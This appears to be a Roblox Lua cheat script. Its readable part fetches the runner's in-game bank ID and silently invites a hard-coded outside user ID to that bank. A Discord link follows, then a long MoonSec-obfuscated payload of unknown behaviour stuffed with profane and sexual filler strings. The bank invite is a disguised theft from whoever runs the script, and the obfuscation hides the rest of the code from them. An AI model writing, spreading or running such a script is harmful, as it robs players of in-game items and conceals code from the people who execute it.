local lib = require(game.ReplicatedStorage:WaitForChild('Framework'):WaitForChild('Library'))

local mybanks = lib.Network.Invoke("get my banks")
local BankID = mybanks[1]['BUID']

local args = {
    [1] = {
        [1] = BankID,
        [2] = 2750637955
    }
}

workspace.__THINGS.__REMOTES:FindFirstChild("invite to bank"):InvokeServer(unpack(args))

_pKrI35BfHEG7IptM, Protected_by_MoonSecV2, Discord = 'discord.gg/gQEH2uZxUk'


,nil,nil;(function() _msec=(function(_,__,_l)local __l__l=__["زكك؃ټآنحآئكڪضجس؃ڝ"];local _ll__l=_l[_[(0x2fa+-127)]][_["ؠزڪحسزڪضجقجك"]];local _llll=(-#{",",10;1}+7)/(((((-#[[this memestring is sponsored by RAID scripting legends]]+((-0x6a+-2522)/0x24))+41)+-#'this file was obfuscated manually')+230)+-#[[<@761654159095103499> <@761654159095103499> <@761654159095103499> <@761654159095103499> <@761654159095103499>]])local _lll=((((-#"disagree"+(0x306-446))-211)+-#"why do guys only want bitchy bimbos who walk all over them")+-49)-(69+-0x44)local ___lll=_l[_[(-#[[Cuz ur a fucking donkey]]+(0x9b+-22))]][_["؃سدضڝڪددنضح"]];local _lllll=(((-5819/((59860/0xcd)+-#"fivem when they block the PSU watermark"))+0x5a)+-#'this message was written on the 4th of August, 2021 at 4:50 PM GMT')+((5168/0x4c)+-#"this message was written on the 4th of August, 2021 at 4:50 PM GMT")local ___ll=_l[_[(602+-#{'}',{};","})]][_["ټآئحسؠڝؠدح؃س"]]local __l=(290/0x91)-(((((12790+(-0x46+18))/193)+-#'free nitro real?!')+-21)+-#'Plz send federal booty pics')local _l__l=(-120+(129+-#{9,'nil',46,9,1,(function()return#{('HphFkl'):find("\104")}>0 and 1 or 0 end)}))local __l_l=(10+-#{1;'}',",";1,80,{},80})local _l_l=((5425/((((1222+-#{{};65,'nil'})-670)+-#'Ruqen thinks his personality is bad, therefore he makes egregious statements to compensate')-0x11c))+-#"dOeS iT sUppOrT gEtFeNv tHo?")local _l_ll=((150+((-81+(-0x65+41))+0x17))+-#"Get it bc perth needs to stfu")local _ll_=(-#[[hi paster]]+(696/(5626/(((4681380/0x6e)/0xf6)+-#'This code was obfuscated using PSU, which stands for Penis Sucking Utilities'))))local ____=(10+-#{(function()return{','}end)();",",",";77;'nil',",";'nil'})local ___l=(6+-#{(function()return{','}end)();(function()return{','}end)();(function()return#{('LpBHpk'):find("\66")}>0 and 1 or 0 end),26})local _ll_l=(-#"<@!847154787934011462> shut the fuck up"+((((-0x5f1/13)+256)+-41)+-57))local __lll=(((-#'you have failed the script logging speedrun'+((1325-0x2c1)-331))-140)+-0x68)local _l__=(-#{1;(function()return{','}end)(),86}+5)local __ll=((105-(-#'im finna commit 9/11'+(((-0x2a+837242)/104)/70)))+-#":)))))))")local __l_=((-0x1d-(((-105+0x1e)+-#[[boy what the hell boy]])+0x8c))+75)local __ll_=(0x56-(((0xd8c0/192)+-32)-0xaf))local _l___=((117+-#{{},'}',{}})-0x6e)local ____l=(9+-#{{};",";(function()return{','}end)(),(function()return#{('KblpOB'):find("\108")}>0 and 1 or 0 end),153})local _lll_=((0x37f6/(((-#{(function()return#{('omolhH'):find("\111")}>0 and 1 or 0 end),(function()return#{('omolhH'):find("\111")}>0 and 1 or 0 end);'}'}+697)-383)+-#"Fact check! Roblox is written in the Roblox programming language"))+-#'when the same meme string gets posted a trillion times')local _ll__=((-#{1,{},'}';",";81;'nil'}+102)/24)local __l__=(-34+((-#[[hey psst you the wrapper function is right there]]+(-0x27+(-#{'nil','nil';'}',1,{};42,'nil'}+188)))-56))local _l_l_l=_[(0xaa6-(0x17106/67))];local __ll_l=_l[_[(-#{'}','}','}';'}'}+114)]][_["آكندنڪؠدؠدزق؃ئ؃ن؃ضق"]];local ___l_l=_l[(function(_)return type(_):sub(1,1)..'\101\116'end)('دججقڝڪټق')..'\109\101'..('\116\97'or'نسكڪجحضڪ').._[((2514-0x501)-634)]];local _l__ll=_l[_[(603+-#{{};{};",",'nil'})]][_["كڪنئح؃سؠسټڝجټز"]];local __llll=(-#'Your balls'+(0x180/32))-(33+(-8-(0x87-112)))local _____=(((((0xa1ba/127)-204)+-#"i know what sex is, but i wont tell you")+-50)+-#[[imagine if roblox didnt use lua]])-(102-0x64)local ____ll=_l[_[(-18+0x80)]][_["ئز؃؃ؠؠضنؠ"]];local _ll=function(_,_l)return _.._l end local _l_lll=(-#[[This file has been enchanted with uncrackable V, fuck the fuck off]]+(-0x7e+196))*(-#'it7ucd'+((-#'One day ill make the onions cry'+(((-35+0xbc5)+-#[[moonsec source: if code then obfuscate end]])-1485))/142))local _lll_l=_l[_["كؠؠدنڪ؃نسقزقكق"]];local _l_=(0x38-54)*(0x11b-((-#'Shard fard poo gaymer'+(72360/0xc9))-0xb8))local _ll_ll=(-0x72+1138)*((13923/((18483/0x65)+-#'This file has been enchanted with uncrackable V, fuck the fuck off'))-0x75)local _l___l=(((-#'Nice constant dumper you got there'+(1487-((0x133e0/96)+-#[[Why I have more chromosomes than da rest of the people]])))/0x7)+-#'FREE LUA OBFUSCATOR DOWNLOAD REAL NO FAKE 2024')local ___l_=(((-#"hello"+(((91423-0xb2a9)+-#"Members can send one message every 6 hours")-0x593c))/235)+-#'Before you marry someone make them use a computer with slow internet to see who they really are')*(-121+0x7b)local _l_l_=_l[_["جكآقزكقز"]]or _l[_[(-#"oh wait thats an invalid character"+(0x11c5b/115))]][_["جكآقزكقز"]];local ___=(-#[[how many meme strings do we have]]+(45504/(-#"no i legit burned it"+(0x49b4/(0x10f-165)))))local _=_l[_["ټكحجحزحڝټدضڪزسڪقنز"]];local __l_ll=(function(_l_)local ___,__=2,0x10 local _l={j={},v={}}local _ll=-__l local _=__+_lll while true do _l[_l_:sub(_,(function()_=___+_ return _-_lll end)())]=(function()_ll=_ll+__l return _ll end)()if _ll==(_l_lll-__l)then _ll=""__=__llll break end end local _ll=#_l_ while _<_ll+_lll do _l.v[__]=_l_:sub(_,(function()_=___+_ return _-_lll end)())__=__+__l if __%_llll==__llll then __=_____ _l__ll(_l.j,(____ll((_l[_l.v[_____]]*_l_lll)+_l[_l.v[__l]])))end end return ___ll(_l.j)end)("..:::MoonSec::..؃دحجئضسزقكنؠآټڪڝټقآ؃نؠكسقدسآضزئححڪجآ؃جڪڪټكآضآ؃كنقضز؃نټنؠندققز؃ضضجڪجآدق؃حټآڪقآڪؠآكسقزز؃س؃ڪقآآؠزنحټآڪقآقؠآزڪقؠزسحضڪسټ؃ؠؠنس؃ئزڪسزضحجټحقدجڝڪټكدجكحنټكضق؃سؠكڝؠئسټآ؃؃زڪټټقآجححڝنڪسټؠؠڝڪڪجسدؠ؃سڝدض؃ئ؃حح؃حڝزټكؠجض؃جئدڝ؃نسزئضجآحؠ؃نڝڪټآ؃ؠضحجقحج؃ڪسكئضجقحآدقحئقؠسسضدجآزنزجسټضقجؠحزدؠڝككڝؠنؠټنڝك؃قئسنسئحآآننټكققجڪحآقؠزنجقآسڪضڪئحدؠؠټكآقززحننؠزكزكجزضضكجححټحز؃كڝؠڪنجئض؃جزحح؃ټجڝئئجؠدڪسحكنزنسضض؃قحقؠقضجڝئڝجؠحك؃آ؃ضڪجټزؠڪئنحندض؃؃ئڝجڝجئدآ؃جڪجڪسنسنئكؠزڪڪآڝدټنآضؠ؃؃كڝددنسنئزجحدټئڝضقضح؃ټدكدحڪټټنآڪنڝكزقڝق؃سنححټ؃ؠقنجقڪكككدسڝؠقحضقڝ؃؃ڪسټدؠآ؃ڪڝزڝدآڝؠسټححټدئڝڝڪنجآحددقڝؠحنزحضزئححټقنسئسضئ؃حكحجسڪقضض؃ضنڪزآضجسزئجئكؠآنؠجكڪقكننكقس؃ئ؃ح؃؃ؠڝسحئجڪدق؃ضڝقټټآزسڪزڪقؠزسؠقڪقټ؃ؠؠنس؃سڪضآؠكحئدحقدجڝڪجكجكججدټسققضسؠضسئدك؃قكزدضټئؠټكؠدككقئسڝآجنكنئكن؃آڝدټآآزحضددڝنټآآآؠ؃قكحد؃نڝضڪ؃جئدنڪدك؃ززسحئټزټقنزضسآزقټسؠننضك؃آؠټقؠسنڝكؠقدسؠسقټجؠڪنككئزڝسنضضق؃ق؃دز؃دڪآټزحزنڪكټقجسڪضكؠزكڝقسسڪسئئنآسؠدكآقزؠڪضټئكججدڪ؃كڝئټڝټآؠضن؃قټزسسنئآجزححدڝڝقڪجټدؠكؠكقڝزنسضز؃جؠحسدئڝآڪنټحؠڪنقؠجزڪسكضزجڝحټدض؃ټڪؠڝسآدنآكنقحز؃ضقضڪحڪجك؃ئڪڝټټآضؠجكؠكئزدضآئزجحح؃؃قڝزټڪآكؠئكڝقنزضسحئؠجسحدد؃ڝزڪسآټؠقنجقڪكسسئض؃جنجزدجڝؠڪټټدټننزكحزټققنڪجڪج؃دئ؃سڪنڝكآ؃ؠټكسقدزئضزئټحټدق؃جڪڪټكآئؠقكنقؠز؃ضؠئسجددآ؃زڝنټټآنؠجن؃قكقسضڝئنجڪح؃دټڝسڪدآآؠزنحقټزڝسجضزجكحس؃ڝدنڪضټ؃آحنسكقزآقكضحئجسټدج؃ضڪكڪكؠڝنؠكضقدسؠضنككحآدز؃ح؃حټقآئنڪكټټآسڝضنئضئټدؠ؃زڝدڪڪآنؠحنئققكدضڪئكجئجڝسضڝضڪزآؠؠټندؠ؃زززئئټجقحؠ؃ڪ؃ئڪئآڝؠننضك؃زؠسڝضدئححزدحڝټڪقټجؠڪؠدكئقدسنضزئ؃جټدس؃دڝضټزټئنټكققجسڪضكئئجسدن؃ڪڝ؃ټټآسټدكآقززجضټئڝججحح؃كڝنڪجآنؠزن؃كضزسسحئآجكححددض؃ڪجآڪؠكنڪقڝزؠسضض؃ض؃حسدجڝآڪقټحؠټنقكجنقسكضزجڝحندض؃سڪؠ؃سآدنآكنقحزټضقسئحڪئك؃ئڪڝټټآضآټكؠكڪزدقآئزجحح؃؃قدسټڪټآؠئآڝقنزضسجئؠض؃حدحئڝزدحآټؠقنسقڪزآسئسسجنجضد؃ڝؠڪكټدټؠنزكجزټسقضججڪحؠدئ؃حڪنټسآ؃نؠټآقدسڝضزئضحټدق؃ج؃؃؃؃آئؠجكنقڪز؃ضؠئسئجدآ؃زڝزټټټټؠجكڪقككئضڝئنجنح؃د؃ڝسڪحآآټزنحقټزټسجضججكجد؃ڝدنڪضټ؃آ؃نسكسزآقزضحضټحقدج؃جڪكټكؠڝؠؠكضق؃سؠضسئسحآدټ؃حڪټټقآجنڪككققسڝضنئضجسدؠ؃نڝدټآآزؠحڪڪققزئضڪسكئضدڝدجڝضڪقآؠؠؠندكڪنڪسحضقجقحڝ؃ڪڝكڪئآڝآضنضككزؠزدضدجڪحزدقدضڪقټآؠڪڝنكئق؃سنضضئ؃حڝسڪ؃دڪآټزدجنټككقجق؃ضآئئجقدن؃آڝ؃ټؠآسآجڝنقززآضټض؃ججدڪ؃كڝئټڝآنآ؃ن؃كجزسسدئآجزحح؃ټ؃حڪجټ؃ؠكنسقڝكنسضض؃ئضحسدؠڝآ؃جټحؠټنقكجقزسكضسجڝحآدضحسڪؠټسآننآټزقحسڪضقئكحڪدټضآڪڝټنآضڝ؃كؠقززدس؃كڝجحدټ؃قئئټڪآنؠئؠدقټزضسكئؠجڝحد؃آڝزڝئڝدؠقنټقڪقدسئئڝجنحضد؃ڝؠڝدټدآئنزكحزټسقضججڪججدئ؃دڪنټزآ؃آؠكسقدزسضزئآحټجئ؃جڪڪټكآئؠقكنقزز؃سسئسجضدآ؃زڝحټټدزؠجكڝقككئآقئنئجح؃دقڝسڪضآآؠټڪزقټقسسجككجكحض؃ڝڝؠڪضټئدجنسكدزآؠحضحجڪحقدزضسڪكټئؠڝڝككضقدسؠسقئئحآحض؃حڝضټقآجنڪككندسڝسكئضجقدؠ؃سڝدټآڪآؠحنؠققزضضڪئؠجئجڝزجڝضڪجآؠآئندكؠززسقضدجقحآ؃ڪئ؃ڪئټ؃ؠننزك؃زڝؠڪضدجآحزضكڝټڪكټجآئنټكئقجسنقزئ؃حآدس؃جڪآټؠدننټكققجن؃ضكئضحڝئ؃جضڝ؃ټؠآس؃زكآققزحسزئقجززس؃كڝئټڝح؃ؠضندقؠزنؠكئآجزححسئڝقڪئآڪآؠټؠقڝزټسضسكجؠحسدد؃ڪڪنټحآدنقكآزڪسكضئضدقؠدض؃ضڪؠڪنآدنآكزقحسټضقئكحڪدن؃ئڪڝټنآضؠ؃كؠقؠزدسحئزجحدټ؃قڝجټڪآټؠئكڝقنزؠس؃ئڝجسحد؃آڝزئڪآټؠكنجن؃زآسئضقجنحآد؃ڝؠڪسټدټكنزكآزټز؃ضججڪحكدئحئڪنټڪآ؃نټكسقجسآزټق؃حټحد؃جضنټكآضنڝن؃قضزئؠجئسجددآزجڝحټڪآقآضندقكزټضڝس؃جضح؃؃ؠڝسڝڪآآآدنحكضزقسجئڪئؠضؠ؃ڝ؃ضڪضټحؠؠنسكدزآزحضحئسحقدڪڝڪڪؠټئآضآحكضقكسؠآحئدحټدز؃حڪټټآدؠنڪككقئټؠضنئسج؃جؠسڝڝدڪضآزؠنكټقنزجضڪسسجئحك؃نڝقڪ؃آؠؠسندنكززسټئټجنحج؃ڪڝكڪئحئؠننڪك؃قسسسضحجآحټدسڝټڪآټجدؠنككضزڝسآضضئئقجدس؃دڪآجئآحنڪكققجټسضكئئحڝدؠ؃ضڝ؃ټؠآسؠدكآقززضسضئقججدڪټټڝئټڝآنؠضن؃قؠڪسندڝضجؠحح؃ټڝقئسجسدندسسحزنسضض؃جؠؠندضڝآڪزټحدڝحد؃زڪجسنس؃جڝحندضسنس؃حڪحقدنټكآآؠضندنئقڝق؃ككڪڝټنآضؠ؃كؠقسسدكؠآسجقدټ؃قڝجضدجټحس؃قڝقټآآنئڪجسحد؃آسنضزحڝټننجقڪزكزسضحجنحقد؃؃؃ڪسټدؠآنزآجزټسؠضجئدحكدضڝڝڝ؃جنآ؃نڪكسقسسآضقئححڪدق؃زئسټكآئنڝكڝقضزدضؠئنقكدآ؃زڝحڪضآقؠئكڪكؠززضڝئټجضحض؃ؠڝسڪدآآڪقنحك؃زقسسئڪجنحئ؃ڝئڪڪضټجؠؠنقكدزآسزسئزئحقدسڝڪڪڝټئؠڝنننزكسسؠضنئدحڝدز؃حڪټڪنآجنڪكڪقئزضضنئضج؃دؠ؃سڝدڪحآزؠحكټققزجز؃ئكجئحس؃نڝؠڪ؃آؠؠسنضقآززسزئټضسحج؃ڝڝكڪئڪآؠننڪك؃زڝسسضدجآجكدنڝټڝحټجآضنككئزڝقنضضئ؃جضدس؃ؠڪآټكآحآټكققجزكضكئئحڝحح؃ضڝ؃ټؠآسؠڪكآقڝزحضټئقججدڪ؃ك؃حټڝټحؠضن؃قؠزسسدئآئحححدؠڝقڪضآڪټكنئقڝقضسضضؠجؠحنددڝآڪزټحآقنقكضزڪسؠضئجڝحندض؃ؠڪؠڪدآدنڝكزنحسټضقئڪحڪحئ؃ئڝ؃ټنآضؠ؃كؠك؃زدضڪئزجئدټ؃قڝجټڪآټؠئنققنزڝس؃ئؠجسحددضڝزڪضآټؠننجنڪزكسئضحجنحڪد؃ڝآڪسټضآجنزكززټزسضججڝحكحس؃حڪنټنآ؃ؠ؃كسقدسآضزقئحټدټ؃جڪڝټكآقنڝكنټكز؃ضڝئسججدآ؃زڝحټټج؃ؠجكڪقكزضضڝئنجضحد؃ؠڝسڪدآآؠزنحقټزقسجئڪجكحئدسڝنڪضټ؃ؠؠؠټكدزآسزضججټحقدجڝڪڪكټئؠڝننكضق؃سؠضسئدحآدز؃حڪټټقآجنڪككقئسڝضنئضج؃دڪ؃سڝدټآآزؠحكټققزجضڪئكجئدڝ؃نڝضڪ؃آؠؠسنجقآززسحئټجقحج؃ڪڝكڪضآڝؠننضكحزټسسضدجآحقدزڝټڪقټجحڪ؃آڝضڪؠټسضزئ؃حؠدس؃دڪآټزآحنټؠضقجسڪضكضسسسدن؃زڝ؃ټټآسؠدكآككنكضټئؠججح؃؃كڝئټڝټآؠقن؃قڝزسسحئآجزححدجئقڪجټجؠكنئقڝزؠسضضئجؠحسزدڝآڪزټحؠڝنقكجزڪسكؠئجڝحندض؃؃ڪؠټسآدنآڝزقحسټضقئسحڪدك؃ئڪڝجنآضؠ؃كؠقززدضآئزجحضز؃قڝزټڪآؠؠئن؃قنزؠسنئؠجسحدحضڝزڪجآټؠكنجكحټدسئئڝجنجڪد؃ڝآڪسټز؃دنزكحزټزسضججڝحكدضڝڝڪڪحټآ؃نؠكسقڝسآضقئحجدز؃؃جڪڪټكټټنڝكؠقضزسسضئسجحدآح؃ڝحټڪآقؠجكڪقټآآضڝئنجضجك؃ؠڝزڪدآآ؃ڪنحكدزقسضئڪجآحئ؃ڝضدڪضټضؠؠنككدزڪسزضققححقدزڝڪڝڪټئآ؃ننكنق؃سڝنڪئدحآدزدزڪټټكآجؠحڝدقئسڝضنضڪج؃دآ؃سڝدججآزؠسكټقنزجسدئكجئزس؃نڝنڪ؃آڪؠسنجقآزټنزئټجآحجحقڝكڪضآڝؠڝنضكئټجسسضدجآئددحڝڪڪقټج؃ضنككقزڝسنضضئ؃حؠدس؃سڪآټؠآحنڪكققجسڪضككقحڝدڪ؃ضڝحټؠآسؠدكآڪڝزحضټئقجئدڪ؃كڝئټڝسحؠضن؃قؠدڝزدئآجزححس؃ضكضججڪحد؃ټ؃دټڝقضن؃نجكضزسسنض؃ئنسسؠحكجزڪسككڪؠحككقجئئض؃جكج؃د؃ڝآقجزئضقئجحڪزڝزسضڪئزدزڝزټټقززكضآئزجحكدززسدضججسدس؃ئڝآججسقئؠجسحدحآسڪئؠئدح؃آجؠقنجسضضججنحضد؃ئڪضضجڝدټقڝؠڝزټسقضجكدقنقئسڝضحجڪجحد؃ؠسټدټئآسنزكؠقدزؠ؃ڪحدحضحجڝټڪټټضآټسسجؠسكسقضسئحڪقڝضدزنكؠقحدڪټقؠسكضزدكدئ؃؃ڪؠټؠنجزڝسجئڪجكسآقجسڪضضدزح؃دنجنقضسزضحجټزؠقآسآئنئئجح؃ڝؠضټقآ؃ضآئدحآدزئجضنئزجقدآ؃ټدقزحضنئضج؃ك؃زقضټجدآؠؠحكټققڪجؠڝؠؠنقڝحدسڝضڪ؃آؠ؃ندجڝضټڪآكؠحننسققئضڪضحئجټ؃نڝك؃زؠسسنسنڝقآقئسؠئكئ؃حجڪجؠئټئزجضضئ؃حؠسسسټئټض؃حزدڝټڝڝقټزحآضئحڝدن؃ضضدئؠجسدټ؃ضڪنټجټدؠدنحقآجقضڪضحجكحجآؠقڝزسسدئآقدكضزآسسڝكټئؠكنئقڝآآآنؠټننكنزسحزڝقټحؠټنقڝحڪڪؠئآسققضټئنئحضددڪ؃سڝجآڪآؠټټآآك؃ئئدآ؃ئڪڝټندنحح؃زئئزسضآئزجحسڝزدضنئسجټڝئنئقنزضس؃ؠڝكڝكضزقضآئآټحؠقنجقڪؠآټ؃ؠڪؠدكجزن؃؃ڪسټدؠآڪڝ؃دڪؠآټآآضئجزدئڝڝڪنجآحددقڝؠڝئټدآضؠضكحئزسؠسحئټجئؠ؃كڪقضز؃ضؠققن؃ق؃ق؃ئزڪحآقؠجكڪآڝڪجټدنټكن؃قدجڝسڪدآآڝن؃جڝكڪئآضنڝكآقڝقڝڝنڪضټ؃جؠدآحؠټقنقضجئجحقدجڝڪسدئئحح؃ؠ؃دڪآقدضنئدحآدزضحئڪئنجز؃جكڝقئسڝضنكحكڝقكزدضسضضقضؠنكټققزجنسؠټنققڝضنسئضججڝآآنققآززسحكټنئقئقزضڪضسئحؠؠننك؃زؠسسؠئنؠكجقدسڝزآټسؠڪنككئڝحڪجآجڝڪضټدس؃دڪآ؃دڪآآټټټڝؠټجؠآؠكنجزڝسكد؃جئجضحس؃ڪنزؠنؠڪؠآكسقسحكئزئ؃جنحض؃قڝئڪقآسسآقزقنزآضټضدجزجدآئڪحټټټزؠكنؠكنجحدآددڝآټجؠجكجزڪسككڝكدزقسدضڝجزحض؃حڝ؃ټآآسحؠضآئجحڪدكسؠض؃ئزحن؃ضنضقسزدضآقڪكزكدضؠضقض؃جڝدټ؃حڪڝآنزدئؠجسحدضڪضآضحجكحد؃سڪڝڪټآكؠجقټككزڝسټئزجقحدددككزټسقضجقدكققسسئجدئنحكزڪنجقدسآضزنجكټقدجحسضجڪحسدز؃كڝئټؠآڪزضجححؠ؃زڝحټټدحڝټڝدڝكڪ؃آڪؠجنكزڝضزئضححد؃ڝآڪسڝزق؃سجئڪجكسڪضكئټضضجآحن؃ڝ؃ضڪسسآضحجټحقسسسدضقئسحئسقكټق؃سؠضسقكقټقؠسضضضدټحندضضزققسڝضنئضزآق؃سآسض؃زآكؠحكټققڪحټدضڝجڝدڝ؃نڝضحقجڝحنددټڝټآټئآجندقسزجئڪڝحآڝؠننضټڪڪ؃ټټآضنؠكضقضسآئڪئز؃قڝآڪجآټؠڝضټئ؃حؠدسضئئڝئكحزدؠټڝڝقټزككئنحڝدن؃ضججئزحڝدس؃نڝؠضنسدئقججدڪز؃ضضئآحڝڪ؃نزقؠزسسدكئنؠكسزټجڝئقئححجنټقڝزنسضآزننكقزآسڝضزججح؃؃ټټجقدسكضئجڝزسزنسززڝټآآدنآكزڪزټنؠننقكحقآټز؃ئټنآضؠ؃ڝڝڪڝڪئؠڝؠسنئقدجسضنئضڝقدؠڝ؃آڝؠټكحآ؃ك؃ككسدسحن؃ټقؠقنجقڪنڪقئآؠضنزحزضسڪضكجححج؃آحسقجسقضججڪزسزكزجضحئئحئنآكنقدسآضزك؃قڪقضسققحڪجآئنڝكنټقڪضآټنآكحزڝسآجكضحجدضآنزقكزئضڝآدكنقحزجسضض؃جز؃؃ڪسؠقزټسجئڪجكسزززضڝضقئئڪسؠزكدزآسزنئنحكقزڝسزئآجضجج؃ڝڝكټجټڝآضؠجقټزڪسزقدڪ؃آجنڪككټزټئآقؠكككقكسؠضټكنآؠؠحكټققؠؠآجننكقح؃ددڝضڪ؃آؠ؃آ؃سڪڝڪؠټدؠڝسؠڪددزڝكڪئآڝدد؃سڝآڪسټكآدندقآزسڝڪڝ؃ټجؠڪنكټآڝئټزؠسنڪكنزڝسض؃حڪحآحنټكقآڝټټؠآنضكؠسنزدضدضئحؠحجڝدكسزحضټئقكزكدسڝدئئقجټټض؃قڪآڪقآڪؠقكآكضق؃ؠسڝقآڪؠكنئټنڪجآكز؃ؠحقڝقضسئ؃زئضحضدد؃زكڪآڪآآنڝكسقئسكضڝزڝآټنآكزقحنڪؠآنززجكدزقسدجؠ؃قدد؃ڪڪڪؠدسسئزجحدټزدسسئنحآح؃؃ڪڝټڪنټحؠ؃قؠكك؃آڝزڪحجضحآدزڝڪڪآكڪزڪسكقكزكسڪئكئ؃حڪ؃ؠآ؃ڪ؃ټزآ؃سټقنقئسقدكئآحض؃ټڝڪڝ؃ټؠآحؠضضآضدجئحئ؃ڪڝئڪحټدؠآنكقآزآسجئآئ؃حجدح؃؃ڪئآټټ؃ؠقټحؠجكټسجض؃حڝحضدآدد؃آڪضټ؃آڝؠجنټسڪزټضؠحكدئڝ؃دنڝآڪحڪ؃آئكآكؠئضئحجؠئجحزټنآڪڝئؠټآآؠدنسقئضئئڪئټجآڝئڝجؠآؠسن؃كئقڝسؠسټضټئڪجئحد؃ڝؠؠڪ؃نكنجزڪزحس؃ئنڪآآؠؠسندټآڪكټدآدنززسزؠضنضزجزدڝدززققئسسضدجآزڪقدسڝضجئسحڪ؃نڝزڪئڝڪسدئ؃حؠدسسئضؠئضجسدح؃سڝزكؠآټؠټكڝزڝج؃؃قټؠآسؠد؃آڪقڪضټدنټكضقزززححئحجكححآڝڝټټزټقزؠنآسټئ؃حڝحكجقڝڪجقكجزنسضض؃قجقؠزحس؃ك؃ټآؠټنقكجآقؠآنجقټسڝقجسجضنجنحس؃دكآقحسټضقنآكؠزنسؠضئسڪآؠؠ؃كؠقسآدآقنقنؠقحزنكآڪكآكؠئكڝڝسټنآدنڝكؠكجزڝسؠئجئدحؠؠككززكسئئڝؠدقسزآسسضكئدحد؃آڝسض؃ز؃ضججڪحكزسسقضڪ؃جحححج؃ضڝججڝضنئححټدقئئجڪححضقؠنكنقضز؃نزنؠكحق؃سآسئجڝجزدئد؃ڪټؠئسقئنجضح؃ئڪضڪئحجڪدق؃ض؃دټټټضزكجآحئ؃ڝڝنحنحج؃ؠټدنضزآسزضحنضكآقزسڪحج؃جڪڪ؃ؠ؃ضڪكككؠڝؠدكضزټزؠدؠئزجضدضكنققسڝضنئضزؠقټزئضټكنآڪؠحكټققآ؃آټنټنكقؠسڝسقجضټئؠسندقآؠكټدؠدؠدسكزټسؠئزجئقټنكك؃زؠسسآجنضقنزنحقڪټټجؠڪنكڪكآجټجآحزحڪكحد؃دڪآټز؃ضدس؃آڪآڪقؠڪؠحنحقحسڪس؃؃سټ؃ؠدكآقزټدؠآؠؠكققدزڪسسئئحڝحسضڪقڝزسسدئآكڪقجزنضټڪئټكؠكنئقڝټڪآنآجكڪكقزنسآضؠجؠحآدسجآقحسكضئجڝكڪزڪسټض؃حؠآكنآكزقحؠضآآؠزكڪسكزجسحئڪآسڝككؠقسزدآئؠؠنسقټئححح؃ټئ؃حؠدسؠقڪزآڝنټنحك؃قئحضئضجآحضټحڪحڪدټكؠآكآكقجڝجآضآجحج؃؃ق؃ئنؠآكآسنسندضجززحز؃سڝضټؠؠآڝننكققززضټجڪئكضټئؠجدد؃؃ڪآحآ؃آكنټضزكدزنضزئڝجسدئ؃ؠڪڪؠدكڝضئجضح؃؃ؠجآئنجڪدآڝضڝحڪنټكؠجنؠحضدزڝنڪضټ؃ڝټدضڝضڝضنڪآؠنڝكززټ؃كڪكټئؠڝڝټڪئآڪنآؠضقټزؠضقئسجحدآڪڪؠضككقئسڝؠڪنڪنجزڪزضسجئ؃كنؠزكټققزجنؠؠقنحقئقجڝسڪسآؠؠسندڝڝټڝآجؠدنزكنڪدڝټڪئآڝؠندك؃كڪؠآؠڪضئجحزدحڝټحؠجآجحدح؃ڪڪئټقكضئنحؠدس؃دجججآجس؃؃ڝټڝضڪئآحنزكئككددڝ؃ټؠآسڝن؃نڝټڪدآقنټقسقجزؠسنئئجآؠسنجقؠزسسدكنكآككئټ؃؃ڪجآڪؠكڪټڝټڪټټكؠدنكقكزسحزڪڪټحؠټنق؃ضڪجټنآكنقكآزن؃دڪټټسآدنآآدنآټزضآئجحڪدكئآضئجؠحكآسنجقسزدضآكنكزكدضؠضسئټجؠدكضټقڪزضس؃ئؠزكقحزڝضڝؠضټقؠقنجقڪؠنآقؠآنجكجسحس؃ضجئ؃ج؃؃آڝآقئسقضججڪزدزكس؃ئڪجنجحدڪ؃؃قنسآضزئحك؃ق؃سئس؃جنحزحجڝڝڝزئجسسئسجددآزنضزئ؃جټحض؃جڪقڪ؃آڪنؠككڝجدحڝسڪدآآدڝدس؃دڪقكټزټسقسئحدڝنڪضټ؃حئدكڝ؃ڪڝټ؃آئنضكټقضزحئقجزحؠدك؃قڝضټټؠؠئحجقدز؃حڪټئ؃جزحح؃كڪجڪدؠڝؠسنضق؃زكسضجدآڪؠحكټققټسآټؠزنققئزقسكئنټضؠسندقآآحآؠؠ؃نجزجزنضنضټجئحآټ؃ككزؠسسضدزڪكسزسزسحڪئحج؃؃آڝكدجسڪضضئ؃حؠسسض؃جڝحؠق؃ؠسكققجسڪكڝؠسك؃قزسنسزئنجقدآضنكجزحضټئقكټكجسدضؠئټ؃آڝڝڪقټئټزآحؠجئټجس؃ټڝقڪجحددڪدقټڝڪآآڪؠټكآكققنئآئقئئجدڪؠټكڝ؃آنآدنئڝټح؃؃؃ڪؠټس؃ټدؠڝنڪجټكنقنڝقڝكحسكسددنآآؠ؃كؠقسڪجآدؠقنزقحزؠسزججټدؠئكڝقنؠزآڝنڝنڝسققضسكضدححآدنجقڪزكؠدؠ؃ندكجزكسڝضؠجضحدجؠكضزټسقضجنآقڪقؠكجڪټټضآ؃نؠڝزڝدټضڪؠئنحټدق؃جسحئقجزحج؃آڪڪټڪآححڪجئدآ؃زڝححئحټحزدټكقزئضڝئنزسقئسڝجؠضزجدحضدسټضټكټدؠحنضقكقدسئڝضټ؃ؠؠنسټكڝدټئؠجنؠكززآسحجؠئجحڪدڪڪضڪدټټآنآ؃جزدز؃حڪټجؠحؠدجڝآڪڝټحؠؠؠدكآق؃زقټكڪقآزؠحكټڝقټقآ؃نآكجقئقحضنئجئ؃حن؃سڝسقحسحئټجقسآزڪدكحضججحآ؃ن؃جڪڪن؃زدڪضحڪدحڝټڪقحسحزدؠڝآڝئټآآكئدجئدس؃دڪآجڪحجدنڝټڝسټجآزؠزكئنڪ؃ټڝ؃ټؠآسدآڪڪټآټڝآڝكآكزكقنقڝئټڝآنؠز؃حقؠزسسدئڪجزحح؃ټ؃نحسآڪؠكنئڝجزنسضض؃جؠحسددڝآڪزټحؠټنقكجزڪسكضئئ؃حندض؃؃ڪؠټسټجنآكزقجسټټڝئجحڪدكدسڪڝټنآسؠ؃نڪقسزدضآسټجحدټ؃كڝجڪزآكؠضكڝآضزضسئنججسحد؃آ؃؃ڪحآڪؠقنزڪسزكسئئڝئئحضددڝؠڪسجكؠآنزكحزڪسقضججڪحؠزسڝڝڪؠټضآدنؠكسقدزڪززئححڪدقكؠڪڪټكآئآدكټقضزدضؠآسجددآ؃زڝقڝضآقؠئكڪكؠزئس؃ئنجضح؃؃ڝئڪڪدآآؠزؠئقټزكسجس؃ز؃حئد؃ڝنزؠټ؃ؠؠنسكزڪدسزضججټسجدجڝڝڪكټضؠڝنڪڪټق؃سؠضسزآحآدق؃حڝڝټؠآجنڝككدقسڝضنئضجسجج؃سڝحټآڪ؃ؠحكڪققزجضڪئټقآدڝ؃